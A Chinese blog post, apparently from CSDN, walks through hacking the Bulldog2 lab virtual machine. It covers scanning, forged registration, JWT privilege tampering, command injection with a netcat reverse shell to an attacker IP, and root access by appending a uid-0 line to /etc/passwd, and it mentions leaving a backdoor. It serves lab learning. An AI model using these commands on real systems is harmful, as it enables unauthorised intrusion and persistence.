渗透测试实战2--bulldog2靶机入侵

最新推荐文章于 2022-03-17 10:29:55 发布
最新推荐文章于 2022-03-17 10:29:55 发布
阅读量449 收藏
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45070118/article/details/98891575
版权

信息收集

用户先登录,用dhclient自动获取ip
在这里插入图片描述

Kali
在这里插入图片描述
Nmap扫描
nmap -sn 192.168.10.1/24
在这里插入图片描述
扫描端口
masscan --rate=10000 --ports 0-65535 192.168.10.133
在这里插入图片描述
扫描开放端口的详细信息
nmap -sV -T4 -p 80 192.168.10.133
在这里插入图片描述
searchsploit nginx
网站版本 kali里没有上面我们扫描到的nginx 1.14版本
在这里插入图片描述

端口探测

Kali Linux提供一款基于字典的Web目录扫描工具DIRB。该工具根据用户提供的字典,对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破,以发现更多的路径。同时,该工具支持代理、HTTP认证扫描限制访问的网站。
默认字典
dirb http://192.168.10.133
在这里插入图片描述
Kali自带的字典
dpkg -L dirb
在这里插入图片描述
使用大字典探测
dirb http://192.168.10.133 /usr/share/dirb/wordlists/big.txt
在这里插入图片描述
进入这两个页面发现没有得到什么信息,所以去js页面查找信息
在这里插入图片描述
在这里插入图片描述
点击注册
在这里插入图片描述
在这里插入图片描述
无法注册
在这里插入图片描述
使用register作为关键字对js文件进行搜索
发现如下有用的信息
在这里插入图片描述
这里有2点要求:

  1. Content-Type 必须要是:application/json
  2. post 数据包内容处,必须要严格按照js代码里的规范

根据js的信息,我们可以使用post提交新账户信息来完成注册,我们使用burpsuite抓包然后按照要求对其进行改包
登陆界面抓包,将数据改成上面js界面的要求,然后返回true即为注册成功
在这里插入图片描述
使用新账号admin123,admin123
登陆成功lwb
在这里插入图片描述
该账户没有什么可利用的信息,我们需要提权

水平越权

在这里插入图片描述
在创一个账户
在这里插入图片描述
将url后面直接改成admin123发现直接进入,存在水平越权

在这里插入图片描述

垂直提权

重新去登录界面登陆抓包
抓取回包
在这里插入图片描述
然后forward放过,就可以看到回包
在这里插入图片描述
https://jwt.io
查询是什么类型的
发现auth_level,应该是判断用户权限的
在这里插入图片描述
到登陆的js文件里查看,搜索auth_level,看到这句,应该是判断用户权限的,通过代码我判断将最后的standard_users得改成master_admin_user就行
在这里插入图片描述

将最后的standard_users得改成master_admin_user
然后forword放包
在这里插入图片描述
然后直接登陆了admin界面

在这里插入图片描述

获取shell
随意输入账号密码,密码故意输错
在这里插入图片描述
抓包
在这里插入图片描述
放入reprater
在密码后面加上一句反弹shell命令,并在kali监听
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 192.168.232.131 443 >/tmp/f

在这里插入图片描述
成功拿到shell
在这里插入图片描述

提权

python -c ‘import pty;pty.spawn("/bin/bash")’ —— 将shell转换为完全交互式的TTY;
进入cd /etc
Ls -la | grep passwd
因为我的系统问题导致输入每个都变成输出两个
在这里插入图片描述

Cat passwd 查看用户

在这里插入图片描述

perl -le ‘print crypt(“pass”,“aa”)’ //perl需要一个加密盐对密码pass进行加密,如这里使用了aa(salt指加密中用到的随机字符串,用不同的salt可以生成不同的加密结果)。

echo ‘cqq:aaW3cJZ7OSoQM:0:0:cqq:/root:/bin/bash’ >> passwd
在这里插入图片描述
Cat passwd
发现新用户
在这里插入图片描述
登陆,成功拿到root权限
三连问
在这里插入图片描述
之后便可以留后门了
这次实验看出了我们需要从js中能发现出很多线索

安全小菜鸡
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali2021 实现nginx 反向代理
文公子的博客
10-09 503
kali2021 实现nginx 反向代理 1.正向代理与反向代理的区别 共同的目的 : 实现源地址到目的地址的访问 区别: 1.正向代理需要在客户端进行配置,如burp,部分翻墙软件等 2.反向代理,对于客户端是无感知的,有点类似与目的端口映射, 将服务映射到公网 2.反向代理在攻防中的应用 1.钓鱼,进行社会工程学攻击,陪喝wireshark等抓包软件抓取流量包 2.VPS,当被攻击的服务器在企业内网,我们无法找到一台机器可以访问他时。 在该服务器上开启一个服务,并将其代理到
靶机渗透测试实战(四)——Bulldog2渗透实战
橘子女侠
05-10 2872
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)渗透测试 四. 实验总结 一. 实验环境 靶机Bulldog2 IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息...
bulldog123靶机渗透
yyh的博客
06-03 442
实验环境: 攻击机:Kali(192.168.150.129) 靶机:bulldog123(未知) 思路: 信息收集=>寻找漏洞=>利用漏洞反弹shell=>提权至root=>清理痕迹 主机发现:(netdiscover) 被动监听netdiscover -p 主动扫描:netdiscover -i eth0 -r 192.168.150.0/24 端口扫描(masscan): masscan --rate=10000 -p 0-65535 192.168.150.132,#r
渗透测试实战3——bulldog2靶机入侵
浅浅的博客
04-25 935
一、实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150、(192.168.247.151) 开始之前,需先登录bulldog2。账号:dirty,密码:pass,并使其获取IP 二、实验步骤 (一)主动信息收集 1、扫描存活主机 2、扫描开放端口(192.168.247.150和192.168.247.151开...
kali渗透综合靶机(三)--bulldog2靶机
W小哥
03-07 1204
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova 二、bulldog2靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至Virtual...
Kali Linux渗透测试--windows 10入侵和提权过程
热门推荐
无崖子的博客
08-21 3万+
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、Metasploit对windows 10入侵测试 环境
vuInhub靶场实战系列-bulldog-1
最新发布
06-03
vuInhub靶场实战系列-bulldog-1
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
French Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的French Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
靶机漏洞报告.pdf
10-12
该文档 主要是针对靶机做的渗透测试报告,用的扫描工具是OpenVas
atomic-bulldog-grid::office_building:基于CSS网格布局CSS(SCSS)网格,具有@supports后退到flexbox
02-05
原子牛头犬网格 :collision: :dog_face: CSS(SCSS)网格,基于具有@supportsCSS网格布局回退到flexbox... Atomic Bulldog是基于原子设计方法的Scss(Sass)样板。 它集成了Node KSS以自动生成实时样式指南/样式库。
Kali Linux渗透测试实战 2.2
Conan
06-23 2633
目录 2.2 操作系统指纹识别 2.2.1 Banner抓取 2.2.2 TCP 和 ICMP 常规指纹识别技术 TCP数据报格式 ICMP首部格式 TTL与TCP窗口大小 FIN探测 BOGUS flag 探测 TCP ISN 抽样 IPID 抽样 TCP Timestamp ACK值 ICMP错误信息 DHCP 2.2.3 数据包重传延时技术 2.2.4 使用N
配环境是最难的:环境的大头:Linux(Kali) + Nginx + Apache + PHP
hanshou101的博客
09-28 7826
1.踩了几十个坑。 2.希望后的希望,希望后的绝望,绝望后的反抗,绝望后的希望。
红蓝对抗 linux内网渗透
whatday的专栏
01-11 978
目录 一、前言 二、提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三、隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap 3.4 portfw 四、反弹shell 4.1 bash 4.2 netcat 4.3 php 4.4 perl 4.5 python 4.6 ruby 4.7 telnet 4.8 openssl 加密 4.9 完全交互式shell 五、登录态 5.1 ...
Kali渗透学习之识别活动主机
ghostyusheng 's blog
04-04 1201
Kali渗透学习之识别活动主机 PING 概述 ping是一种计算机网络工具,用来测试数据包能否透过IP协议到达特定主机。 ping的运作原理是向目标主机传出一个ICMP echo@要求数据包,并等待接收echo回应数据包。 程序会按时间和成功响应的次数估算丢失数据包率(丢包率)和数据包往返时间(网络时延,Round-trip delay time)。 用法 ping 域名/IP 注意事项 如果...
kali入侵windows
weixin_34405557的博客
12-15 4999
因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门。 ####实验环境 ![实验环境.jpg](http://upload-images.jianshu.io/upload_images/4976516-daae4fea5636c8d4.jpg?imageMogr2/auto-orient/...
kali、nmap扫描
我不是程序猿的博客
03-17 4985
kali 实际上它就是一个预安装了很多安全工具的Debian Linux [root@zzgrhel8 ~]# kali reset kali reset OK. 该虚拟机系统用户名为:kali,密码为:kali 基础配置 $ ip a s # 查看网络 $ nmcli connection show # 查看到网络连名为"Wired connection 1" $ nmcli connection modify "Wired connection 1" ipv4.metho..
Kali Linux渗透测试之服务扫描(三)——防火墙识别、负载均衡识别、WAF识别
橘子女侠
04-20 1601
1. 防火墙识别 防火墙识别: 在尽量隐蔽的情况下,扫描出防火墙的过滤规则,开放哪些端口; 我们的扫描行为,并不希望防火墙发现,所以扫描防火墙的目的就是通过发送的数据包,检查回包,识别防火墙过滤的端口; 设备多种多样,结果存在一定误差; 可以根据如下四种情况判断防火墙的过滤规则; (1)使用python脚本实现防火墙识别:firewall_detect.py #!/usr/...
帮我写一段python代码,用循环实现,有两张数据表,第一张表有姓名,品种,第二张表有姓名,种类,日期,当第二张表的姓名在第一张表里的时候,并且日期大于2023年3月31日,将第二张表的种类替换到第一张表的品种里
08-19
好的,这是您的代码: ``` table1 = {'Tom': 'Labrador', 'Jerry': 'Poodle', 'Mike': 'Bulldog'} table2 = [{'name': 'Tom', 'breed': 'Golden Retriever', 'date': '2023-04-01'}, {'name': 'Jerry', 'breed': 'Chihuahua', 'date': '2022-12-01'}, {'name': 'David', 'breed': 'Terrier', 'date': '2024-01-15'}] for item in table2: if item['name'] in table1 and item['date'] > '2023-03-31': table1[item['name']] = item['breed'] print(table1) ``` 这段代码中,我们首先定义了两个数据表,分别是 `table1` 和 `table2`。然后我们通过一个循环遍历 `table2` 中的每一个项,对于每个项,我们首先判断它的姓名是否在 `table1` 中,如果在并且日期大于2023年3月31日,就将它的品种替换到 `table1` 中对应姓名的位置上。最后输出修改后的 `table1`。 请注意,本段代码只是一个简单的示例,实际应用中可能需要更加复杂的逻辑来处理数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值